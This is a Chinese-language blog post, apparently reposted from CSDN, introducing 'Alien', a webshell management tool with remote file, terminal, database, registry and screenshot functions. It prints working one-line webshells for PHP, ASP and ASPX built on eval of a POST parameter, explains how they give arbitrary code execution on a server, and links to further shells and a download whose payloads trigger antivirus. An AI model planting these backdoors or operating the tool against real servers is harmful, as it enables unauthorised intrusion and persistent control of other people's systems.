码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 一款新的webshell管理工具


    Alien

    项目简介

    语言

    C# .NET Framework V4.8

    功能
    • File Manager (可显示图片, 可SearchFile)

    • 虚拟终端

    • 数据库

    • 注册表

    • 监控

    • 截图

    • 系统信息

    项目描述

    一句话木马

    一句话木马是在渗透测试中用来控制服务器的工具
    强大之处在于木马本身体积小,不易发现
    以下是最简单的一句话木马

    1. PHP <?php @eval($_POST['password']);?>
    2. ASP <%execute(request("password"))%>
    3. ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>当然, Alien还可以使用asmx, ashx等等的Webshell。
    4. NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt
    关于JSP webshell

    目前只有比较原始的菜刀版本, 之后可能会加上蚁剑和冰蝎
    shell有进行更改, 新增了可以显示图片的功能

    关于NodeJS webshell

    由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同,  
    NodeJS目的重在管理而非渗透

    伺服器

    Windows, Linux, Unix, MacOS

    Database管理

    MySQL :PHP

    交通 :https://github.com/malbuffer4pt/DBer

    SQL Server :ASP ASPX ASMX ASHX

    原理

    以PHP为例子, eval()可以把string以PHP Code去执行,
    如果eval()中带有可控变量,那么就可以执行任意代码。 
    如eval($_POST['a']);
    HTTP POST a=phpinfo(); 就可以执行phpinfo();

    注意!
    • 工具Payloads文件夹内有符合恶意程序的Payload, 可能会被防毒删除

    • 目前只有删减版,但部份代码没有删除,Disassemble应该会有奇怪但无法使用的东西

    图片

    图片

    图片

    图片

    图片

    图片

    图片

    图片

    图片

    图片

    图片

    图片

    图片

    下载链接: 

    一款新的webshell管理工具icon-default.png?t=N7T8https://mp.weixin.qq.com/s/LBFCvIHLz8GwzZIxWXsd5w

  • 相关阅读:
    使用opencv结合帧差法和背景减法 检测场景异常情况
    Vue - 动态改变元素容器(非页面body)滚动条位置(设置指定子元素div的滚动条位置)
    将时间序列转成图像——马尔可夫转移场方法 Matlab实现
    新入职后的第一天GitLab 与 SourceTree的结合使用
    Navicat for MySQL 视图创建使用方法
    RobotFramework用户关键字(一)
    [IAGC] Kafka消费者组的负载均衡策略
    准备好抛弃 HTML 了吗?Dart 3.1 和 Flutter 3.13 发布
    Jmeter线程组-上
    【软件测试】PDM、PTM、IPD介绍(捣鼓一晚上的血泪知识)
  • 原文地址:https://blog.csdn.net/weixin_46211944/article/details/133740702
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号